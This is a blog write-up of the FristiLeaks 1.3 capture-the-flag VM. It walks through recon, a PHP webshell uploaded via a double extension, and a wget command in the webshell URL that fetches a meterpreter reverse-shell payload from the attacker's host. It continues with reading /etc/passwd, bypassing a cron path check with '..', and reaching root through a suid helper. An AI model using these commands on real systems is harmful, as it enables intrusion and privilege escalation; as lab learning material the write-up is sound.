Thursday, December 24, 2015

FristiLeaks 1.3 writeup

You should know it by now: put a pink logo somewhere and I can't resist.
Downloaded and imported the FristiLeaks 1.3 ova file, with a couple of hiccups because of VMware Fusion (STFU), and ran nmap against it:
$ nmap -p- -A -v $IP

We can see that port 80 is open; the site homepage says "drink fristi" and nothing more.

Now nikto is my next step:
$ nikto -host $IP
[cut]
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
[cut]

I found it interesting that all three directories are drinks and that the homepage says drink fristi,
so I also tried to open /fristi/, which gives back an admin panel.

sqlmap is very cheap to run in the background while you read source code, so I captured the POST request and passed it to sqlmap, even if in this case it was useless.

The homepage source code embeds a base64 encoded string in a comment at the very bottom; I pasted the string into file a and decoded it into file b:
$ base64 -D -i a -o b

Then running file on b says that it's an image:

Renaming it to b.png and opening it shows us that this image is actually a string:

Back in the source code we can see that the header reports the name of the creator of the page:

With some guessing I tried to log in as eezeepz using the string from the image as the password, and bingo.

I'm now in front of a file upload form: time to fire up burp suite again and try to upload a webshell.
After a few minutes of unsuccessful tries, from Content-Type to case mixup, from uncommon extensions to the good ol' null byte, I tried to upload a file with a double extension to exploit a possible misconfiguration in Apache (see AddHandler/AddType) and bingo: shell.php.jpg gets executed as PHP code:

Time to meterpreter the host: I download a php/meterpreter_reverse_tcp payload with wget by visiting the URL
http://$IP/fristi/uploads/shell.php.png?c=wget%20http://$ME/shell.txt%20-O%20shell.php

and execute it by visiting http://$IP/fristi/uploads/shell.php

A quick look at the docroot doesn't give me anything useful; even the MySQL database (see cat checklogin.php) doesn't help me.

Time to enumerate: /etc/passwd shows four possible targets:
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin

Starting from fristi, who gives the game its name, we can see a notes.txt file:

OK, eezeepz is also the "web developer", so I'm sure I'll find interesting stuff in his mess.

Listing his files I found another notes.txt:

So we can execute commands as admin; to sum up the requirements:
  • must start with /usr/bin/ or
  • must be in /home/admin/
I can't see what's in /home/admin, so I have to trust that there are only chmod, df, cat, echo, ps, grep and egrep.
Let's see if this works:
echo "/home/admin/echo \`whoami\`" > /tmp/runthis
chmod 755 /tmp/runthis

After a minute I can see /tmp/cronresult:

Let's see if we can fool the check for ^/usr/bin/:
echo "/usr/bin/../../bin/ls -al" > /tmp/runthis
chmod 755 /tmp/runthis

Cool!
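The check the cron job applies above is a plain prefix match on ^/usr/bin/, so a program path that starts with /usr/bin/ but walks out of it with .. still passes. As an added example (not code from the box or from this writeup), here is that prefix-only check next to a hardened one that rejects any program path that is not already in canonical form and only runs allowlisted program names; ALLOWED_PROGRAMS and the whole hardened_check are my own assumptions about how such a cron runner should be written, not what the box does.

```python
import posixpath  # pure lexical path handling, independent of the host OS
import shlex

# Directories the cron job accepts, as described in eezeepz's notes.txt
ALLOWED_DIRS = ("/usr/bin/", "/home/admin/")
# Constructed allowlist (the programs the notes say live in /home/admin); an assumption
ALLOWED_PROGRAMS = {"chmod", "df", "cat", "echo", "ps", "grep", "egrep"}


def weak_check(line: str) -> bool:
    """Prefix-only test like the box's ^/usr/bin/ match: '..' is never
    normalized, so /usr/bin/../../bin/ls passes."""
    return line.startswith(ALLOWED_DIRS)


def hardened_check(line: str) -> bool:
    """Accept a runthis line only if its program path is absolute, already in
    canonical form, sits directly in an allowed directory and names an
    allowlisted program. Assumed hardening, not the box's code."""
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes
        return False
    if not argv:
        return False
    prog = argv[0]
    if not posixpath.isabs(prog):
        return False
    # A path that changes under normpath contained '.', '..' or doubled slashes,
    # i.e. it tried to escape the allowed directory: reject, don't silently fix.
    if posixpath.normpath(prog) != prog:
        return False
    if posixpath.dirname(prog) + "/" not in ALLOWED_DIRS:
        return False
    return posixpath.basename(prog) in ALLOWED_PROGRAMS


def filter_runthis(lines):
    """Return only the lines of a /tmp/runthis file the hardened check would run."""
    return [ln for ln in lines if hardened_check(ln)]


if __name__ == "__main__":
    # Constructed runthis contents, mirroring the lines used in the writeup
    sample = [
        "/home/admin/echo `whoami`",
        "/usr/bin/../../bin/ls -al",
        "/usr/bin/../../bin/cp -R /home/admin /tmp/admin",
        "/home/admin/chmod -R 777 /tmp/admin",
    ]
    for ln in sample:
        print(f"weak={weak_check(ln)} hardened={hardened_check(ln)}  {ln}")
```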
df says we have enough space to copy /home/admin to /tmp, so:
echo "/usr/bin/../../bin/cp -R /home/admin /tmp/admin" > /tmp/runthis
echo "/home/admin/chmod -R 777 /tmp/admin" >> /tmp/runthis
chmod 755 /tmp/runthis

After less than a minute I see /tmp/admin:

Remove /tmp/runthis with rm -f /tmp/runthis so it doesn't run again.

So, cryptedpass.txt and cryptpass.py in the same place. No need to say what I would do.

cryptpass.py is very easy:

It takes a string, base64-encodes it, then applies rot13 from the end to the beginning (i.e. on the reversed string).
The script that takes cryptedpass and decodes it is:

Both cryptedpass.txt and whoisyourgodnow.txt contain an encrypted password.

Let's try some "su" with these two passwords against the usernames we found in /etc/passwd, starting by getting a proper shell:
python -c 'import pty; pty.spawn("/bin/bash")'

I found that I can su as admin, but since I can already execute commands with that uid I don't care so much.
The decoded password from whoisyourgodnow.txt lets me su as fristigod.

His home has interesting stuff:

cat .bash_history speaks for itself:

Great, the user can somehow sudo. Let's see what he can execute with sudo -l:

Not so much apparently... but doCom is suid ;)

Easy bet:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
replies with our beloved:
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Time to get a shell:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

/root of course contains a .txt file with the flag:

and a message that has a typo, because this image is distributed as 1.3 and the txt speaks of 1.0, but who cares? :)

Thanks Ar0xA for letting me spend some time playing with this box.
